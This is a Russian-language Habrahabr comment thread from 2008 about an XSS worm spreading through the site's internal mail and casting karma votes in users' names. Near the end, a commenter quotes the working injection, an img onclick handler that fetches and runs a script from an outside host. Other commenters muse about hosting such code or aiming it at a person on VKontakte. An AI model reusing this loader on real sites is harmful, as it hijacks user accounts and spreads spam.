Comments 98
нажимать никуда не рекомендую, кажется происходит отдача карма-голоса кому-то
0
самое главное - не нажимать на картинку, иначе от вашего имени отправиться такое же сообщение по всем вашим алресам в хабрапочте. простите все, кто получил его от меня :( Хабраадминистрация - пожалуйста примите меры!
+11
Мне уже эта херь пришла от пяти человек... Почему нет кнопки "это спам!" ?
+4
удаляем неоткрывая
+2
Блин, я думал, после "черного властелина" хабра-разработчики таки задумались о проверке безопасности сообщений. Ан - нет, те же грабли!!! Скрипт в картинке... :(
+16
не исключено, что это всё сама администрация и сделала.
Вот такой PR ход дабы напомнить всем пользователям хабра а его существовании... ИМХО глупость полная... никаких позитивных эмоций.. один негатив... когда в почту валятся 5 одинаковых писем от разных не знакомых людей.
Вот такой PR ход дабы напомнить всем пользователям хабра а его существовании... ИМХО глупость полная... никаких позитивных эмоций.. один негатив... когда в почту валятся 5 одинаковых писем от разных не знакомых людей.
-3
задумываться можно скольку угодно. дыры будут всегда. закон жизни, @#$%^&
так что может и задумались - откуда нам знать
так что может и задумались - откуда нам знать
+3
на личную же почту еще все дублируется, уже куча мусора там, фак... :\
0
http://maxer.habrahabr.ru/ - у меня был отдан голос за него
уже забрал
уже забрал
0
Шесть писем с вирусом получил. С утра насмешило.
0
Пользуясь случаем.... граждане, помогите протетсировать http://blog.supremedesign.ru/ на предмет наличия подобных дыр?
зы. я тут ни при чём, так совпало, двигло делаю
зы. я тут ни при чём, так совпало, двигло делаю
-37
а зачем минусы? я реально полуную почту получил писем счастя!
-11
Люди, не будьте стадом, я здесь ни при чём. Штуку, которая проверяет инпут на придмет наличия всякой ерунды написал реально очень крутой спец — нужно протестировать. если будет всё ок я нипишу статью как защититься раз и надолго. или даже сервис могу такой сделать.
-10
Штуку написал человек, который знает две вещи. JS и HTML. Статей по тому как этого не допустить море. Почитал бы их сначала _ты_, потом сам потестировал. И только следом, если бы решил, что есть что добавить, написал бы статью. Ни ума, ни фантазии, а туда же...
+2
вы уж совсем меня за пацана держите? сервером инпут проверяется, и нет ещё ничего подобного в нашей раше
-10
Спасибо тем кто откликнулся, для хабрян, которые (ошибочно) думают, что я таким образом пиарю отладочный домен будет сделана отдельная площадка, где можно будет тестировать XSS защиту отдельно от блога.
+1
Собственно, вот фильтр — http://blog.supremedesign.ru/xss
(за сутки никто так и не справился с защитой)
Вернёте карму (sic) — напишу как сделать такой же (Суть работы фильтра в том, что стринг сперва парсится в на сервере в DOM-объект, затем все элементы, атрибуты и их содержание фильтруются согласно заданной политике. Задумано, что так надёжнее чем чистить регуляркой.)
(за сутки никто так и не справился с защитой)
Вернёте карму (sic) — напишу как сделать такой же (Суть работы фильтра в том, что стринг сперва парсится в на сервере в DOM-объект, затем все элементы, атрибуты и их содержание фильтруются согласно заданной политике. Задумано, что так надёжнее чем чистить регуляркой.)
-1
Создай новый аккаунт....
0
> Произошла непредвиденная ошибка
> Мы постараемся устранить ошибку в кратчайшие сроки. Спасибо за понимание!
Ну-ну. Надёжность зашкаливает.
> Мы постараемся устранить ошибку в кратчайшие сроки. Спасибо за понимание!
Ну-ну. Надёжность зашкаливает.
0
На отладочных серверах бывают ошибки :-) Я начал дискуссию с просьбы помочь в отладке, что здесь такого?
Вот ваша ошибка: INVALID_CHARACTER_ERR: An invalid or illegal XML character is specified.
Можете сказать что это за "character"?
Спасибо!
Вот ваша ошибка: INVALID_CHARACTER_ERR: An invalid or illegal XML character is specified.
Можете сказать что это за "character"?
Спасибо!
0
- Утром деньги - вечером стулья.
- А можно сначала стулья?
- Можно, но деньги вперёд!
- А можно сначала стулья?
- Можно, но деньги вперёд!
0
честно говоря уже не помню. можете простым переборным или со сроварём, тестом автоматическим выловить много ошибок.
0
Вероятно, что Вы нажали кнопку в тот момент, когда я заливал файл с политикой (я сейчас как раз с ним работаю) он не распарсился и произошла ошибка. Попробуйте повторить запрос — ошибки быть не должно...
0
> Произошла непредвиденная ошибка
> Мы постараемся устранить ошибку в кратчайшие сроки. Спасибо за понимание!
> Мы постараемся устранить ошибку в кратчайшие сроки. Спасибо за понимание!
0
Вряд ли дело в некорректном xml... юзерпик он Ваш только так кушает: [img //onclick="if(window.HKV)return;...] > [img/]
Может быть с кодировкой чего? я сейчас добавил к песочнице форму в utf-8, попробуйте ещё разок если не сложно?
Спасибо
Может быть с кодировкой чего? я сейчас добавил к песочнице форму в utf-8, попробуйте ещё разок если не сложно?
Спасибо
0
Ошибка была вызвана наличием символов возврата каретки в коде (по крайней мере именно так мне удалось воспроизвести ситуацию). Сейчас это исправлено, проверьте пожалуйста ещё раз?
Спасибо за помощь.
Спасибо за помощь.
0
все сообщения из хабрапочты удалили, но про новые входящие теперь будет мигать вечно!? :(
+4
UFO just landed and posted this here
Нет, сейчас пересчитаем непрочитанные для всех.
+2
у меня одно :)
0
UFO just landed and posted this here
еще бы верстку поправить как-нибудь...
0
все еще "одно входящее"
0
Возможно, это от того, что у вас действительно есть одно сообщение (от пользователя habrahabr). Вы, наверное, просто не обращали внимания, на то, что оно у вас уже очень давно мигает
0
У меня 5 непрочитанных мигает, хотя я прочесал весь ящик и ни одного такого не нашёл.
0
У меня вообще никаких входящих нет, а надпись - мигает.
0
Я прям незнаю, аж обидно у меня ни одного письма с вирусом((
+2
говорите адрес, сейчас вышелм ;)
+3
Мне тоже. Это говорит о том, что у нас исключительно здравомыслящие друзья, которые не будут тыкать во всякую дрянь. =)
0
Присоединяюсь. Ежели у кого найдётся экземплярчик — скиньте и мне, пожалуйста.
0
Интересно что ответил хостер на абуз:
Укажите пожалуйста программу, расценивающую данный скрипт как
вирус. Онлайн проверки:
http://online.drweb.com/
http://www.kaspersky.ru/scanforvirus
не расценивают данный скрипт как вредоносный.
- Скрыть цитируемый текст -
Sun, Apr 13, 2008 at 02:58:54PM +0800, rt wrote:
> Здравствуйте,
>
> на http://kadabra.iatp.org.ua/habr/habr.js находится "вирус", создающий
> массу неудобств пользователям habrahabr.ru.
> Примите меры (по крайней мере удалите этот файл). Это можно и как спам
> квалифицировать.
>
> IP 77.120.97.118 ваш, поэтому и пишу вам.
>
> С уважением,
> Роман Толкачёв
> Retta Ltd.
Т.е. впринципе, я терь знаю куда такие вещи хостить.
Укажите пожалуйста программу, расценивающую данный скрипт как
вирус. Онлайн проверки:
http://online.drweb.com/
http://www.kaspersky.ru/scanforvirus
не расценивают данный скрипт как вредоносный.
- Скрыть цитируемый текст -
Sun, Apr 13, 2008 at 02:58:54PM +0800, rt wrote:
> Здравствуйте,
>
> на http://kadabra.iatp.org.ua/habr/habr.js находится "вирус", создающий
> массу неудобств пользователям habrahabr.ru.
> Примите меры (по крайней мере удалите этот файл). Это можно и как спам
> квалифицировать.
>
> IP 77.120.97.118 ваш, поэтому и пишу вам.
>
> С уважением,
> Роман Толкачёв
> Retta Ltd.
Т.е. впринципе, я терь знаю куда такие вещи хостить.
+4
Ну в какой-то степени они правы, ведь это js не попадает под стандартную классификацию вредоносных скриптов :-) Мне кажется что так ответил бы практически любой хостер.
+2
А то что оно создаёт своего рода DDoS (всмысле представим сколько запросов) и что, скажем, пару раз висел хабр. Это как бы всё кибер-преступления.
У меня была идея сделать подобное на vkontakte для одного человека (т.е. против оного), но чёт забил. Кстати, vkontakte.ru ой какой дырявый.
У меня была идея сделать подобное на vkontakte для одного человека (т.е. против оного), но чёт забил. Кстати, vkontakte.ru ой какой дырявый.
0
Да Вы поймите, я их не защищаю! :-) Просто с таким же успехом можно им указать на любой файл, который лежит у них на серверах и попросить его(этот файл) удалить. Естественно они даже ногой не пошевелят в эту сторону. Им надо доказать что файл несёт в себе какой-то «деструктивный» код, что бы они его удалили. По первой просьбе они, конечно, ничего делать не будут.
А vkontakte.ru да, достаточно дырявый :-)
А vkontakte.ru да, достаточно дырявый :-)
+1
Да я понимаю) Это всё камни в их огород :) Если собраться и каждому отправить по сообщению на абуз ( abuse@dc.volia.com ), то может чё и выйдет. Хотя, вижу, сходит на нет весь вирус.
-1
Там хоть люди отвечают, значит не все потеряно. Есть много хостеров, которые на abuse@ не отвечают в принципе. Скорее всего им идёт такой большой поток жалоб, что они их просто не читают.
0
чуствую ся обделенным, мне хабравирус не пришел... пришли-те хоть посмотреть..
+2
Я дебилко :( Сначала увидела кучу писем, они оказались не доступными, написала письмо администрации, что не могу прочитать 404-я выдается. А теперь выяснилось, что и не надо их читать.
+2
аналогично =) Может быть у нас имунитет и из нас стоит делать противоядие? Сколько дадите за образцы моей крови?
+1
расписал бы кто-нибудь (подробно) что да как было...
(если дыра "зачищена")
ни писем, ни habra.js уже нет
(если дыра "зачищена")
ни писем, ни habra.js уже нет
0
Приходило письмо, скрин которого на первом рисунке. До нажатия на кнопку оно ничего не делало. После нажатия оно рассылало себя всем друзьям из первого/второго круга.
habra.js - выложил, предварительно немного изменив.
Ломалось все следующей строчкой:
Надеюсь, теперь этот скрипт не опасен для хабра?
habra.js - выложил, предварительно немного изменив.
Ломалось все следующей строчкой:
<img //onclick="if(window.HKV)return; HKV=1; var script= document.createElement('script'); if(script.setAttribute) script.setAttribute('src', 'http://kadabra.iatp.org.ua/habr/habr.js?r=0.8827674806648955'); else script.src='http://kadabra.iatp.org.ua/habr/habr.js'; document.getElementsByTagName('body')[0].appendChild(script);" src="http://kadabra.iatp.org.ua/habr/habravirus.gif">
Надеюсь, теперь этот скрипт не опасен для хабра?
+3
А я уж было обрадовался новой корреспонденции с хабра =)
0
увидел в ящике письма от незнакомых людей, прошел по ссылке на страничку 404...пожал плечами, снес письма и забыл...че так расшумелись?Не в дверь же почтальоны с телеграммами звонили десять раз , с горшка, от телевизора, или с тётки снимая)))Ха:)
0
Ух, 25 собщений в почту свалилось в связи с "эпидемией", а открыть и посмотреть не получается опоздал, все удалили :(
+1
Хабро-пеар?
0
.... что я сделал: удалил без всяких вопросов в голове. береженого бог бережет.
0
НЛО ПРИЛЕТЕЛО И ЗАБРАЛО ВИРУСОПИСАТЕЛЯ. НЛО ОПУБЛИКОВАЛО ЭТУ ЗАПИСЬ ЗДЕСЬ!
-2
Мда, а вот только счас посмотрел и увидел что карма и хабрасила в минуса ушли. собственно все 13 полученных мной уведомлений проголосовали в "минус" мне. И чем я так не понравился им?
0
UFO just landed and posted this here
мне 22 пришло письма
0
Невъебенно. Опять сломали (http://habrahabr.ru/blog/habraretro/41143.html почти в конце).
Мне отдному кажется что хабр писали индусы?
Мне отдному кажется что хабр писали индусы?
+1
Sign up to leave a comment.
Что за Хабравирус!?